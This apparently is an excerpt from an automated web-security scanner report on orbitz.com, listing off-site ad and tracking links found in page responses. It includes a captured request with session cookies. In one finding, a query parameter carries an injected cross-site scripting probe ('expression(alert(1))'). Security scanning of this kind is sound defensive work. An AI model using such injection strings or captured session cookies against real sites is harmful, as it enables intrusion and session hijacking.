http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=all_destinations_interests&cnt=OVI&z=2ed6&r=15 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=A839888FFEDCAD3C3BAE719F7D2B9A23; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:31 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 200373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
<br />
<a href="http://twitter.com/Orbitz" class="familyContentModuleLink" target='_blank'>Twitter</a>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<li ><a href="http://www.orbitz.teebone.com/orbitz/index.cfm" > Golf</a>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.352. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&
